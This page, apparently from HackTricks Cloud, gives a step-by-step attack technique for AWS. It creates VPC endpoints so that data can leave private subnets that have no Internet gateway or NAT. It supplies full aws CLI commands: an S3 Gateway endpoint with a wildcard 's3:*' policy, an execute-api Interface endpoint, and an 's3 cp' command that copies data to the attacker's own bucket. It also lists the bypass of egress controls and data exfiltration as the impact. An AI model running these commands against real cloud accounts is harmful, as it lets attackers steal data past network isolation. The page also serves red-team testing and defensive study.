🐚 GTFOBins 🪟 LOLBAS 💾 Compiled Binaries 🩸 BloodHound 🩸 bloodyAD 📜 Certipy ☁️ Cloud ⚡ goexec 🤖 HackTricks 🔌 HardwareATT 📦 Impacket 🏰 InternalATT 🔀 Ligolo-ng 🐱 Mimikatz 💣 msfvenom 🔧 NetExec 🤖 OSAI 💥 PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

{{#include ../../../../banners/hacktricks-training.md}}

Summary

This technique abuses VPC Endpoints to create exfiltration channels from subnets without Internet Gateways or NAT. Gateway endpoints (e.g., S3) add prefix‑list routes into the subnet route tables; Interface endpoints (e.g., execute-api, secretsmanager, ssm, etc.) create reachable ENIs with private IPs protected by security groups. With minimal VPC/EC2 permissions, an attacker can enable controlled egress that doesn’t traverse the public Internet.

Prereqs: existing VPC and private subnets (no IGW/NAT). You’ll need permissions to create VPC endpoints and, for Option B, a security group to attach to the endpoint ENIs.

Option A – S3 Gateway VPC Endpoint

Variables
- REGION=us-east-1
- VPC_ID=<target vpc>
- RTB_IDS=<comma-separated route table IDs of private subnets>

1) Create a permissive endpoint policy file (optional). Save as allow-put-get-any-s3.json:

{
  "Version": "2012-10-17",
  "Statement": [ { "Effect": "Allow", "Action": ["s3:*"], "Resource": ["*"] } ]
}

2) Create the S3 Gateway endpoint (adds S3 prefix‑list route to the selected route tables):

aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.s3 \
  --vpc-endpoint-type Gateway \
  --route-table-ids $RTB_IDS \
  --policy-document file://allow-put-get-any-s3.json   # optional

Evidence to capture:
- aws ec2 describe-route-tables --route-table-ids $RTB_IDS shows a route to the AWS S3 prefix list (e.g., DestinationPrefixListId=pl-..., GatewayId=vpce-...).
- From an instance in those subnets (with IAM perms) you can exfil via S3 without Internet:

# On the isolated instance (e.g., via SSM):
echo data > /tmp/x.txt
aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION

Option B – Interface VPC Endpoint for API Gateway (execute-api)

Variables
- REGION=us-east-1
- VPC_ID=<target vpc>
- SUBNET_IDS=<comma-separated private subnets>
- SG_VPCE=<security group for the endpoint ENIs allowing 443 from target instances>

1) Create the interface endpoint and attach the SG:

aws ec2 create-vpc-endpoint \
  --vpc-id $VPC_ID \
  --service-name com.amazonaws.$REGION.execute-api \
  --vpc-endpoint-type Interface \
  --subnet-ids $SUBNET_IDS \
  --security-group-ids $SG_VPCE \
  --private-dns-enabled

Evidence to capture:
- aws ec2 describe-vpc-endpoints shows the endpoint in available state with NetworkInterfaceIds (ENIs in your subnets).
- Instances in those subnets can reach Private API Gateway endpoints through those VPCE ENIs (no Internet path required).

Impact

  • Bypasses perimeter egress controls by leveraging AWS‑managed private paths to AWS services.
  • Enables data exfiltration from isolated subnets (e.g., writing to S3; calling Private API Gateway; reaching Secrets Manager/SSM/STS, etc.) without IGW/NAT.

{{#include ../../../../banners/hacktricks-training.md}}